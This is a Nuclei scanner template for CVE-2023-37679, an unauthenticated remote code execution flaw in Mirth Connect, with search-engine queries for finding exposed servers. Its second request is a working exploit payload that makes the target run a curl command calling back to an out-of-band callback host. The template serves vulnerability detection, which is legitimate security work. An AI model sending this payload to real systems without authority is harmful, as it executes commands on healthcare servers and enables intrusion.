id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
    - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.07052
    epss-percentile: 0.9396
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query:
      - title:"mirth connect administrator"
      - http.title:"mirth connect administrator"
    fofa-query: title="mirth connect administrator"
    google-query: intitle:"mirth connect administrator"
  tags: packetstorm,cve2023,cve,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI

      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        foo java.lang.Comparable curl http://{{interactsh-url}}/ start

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950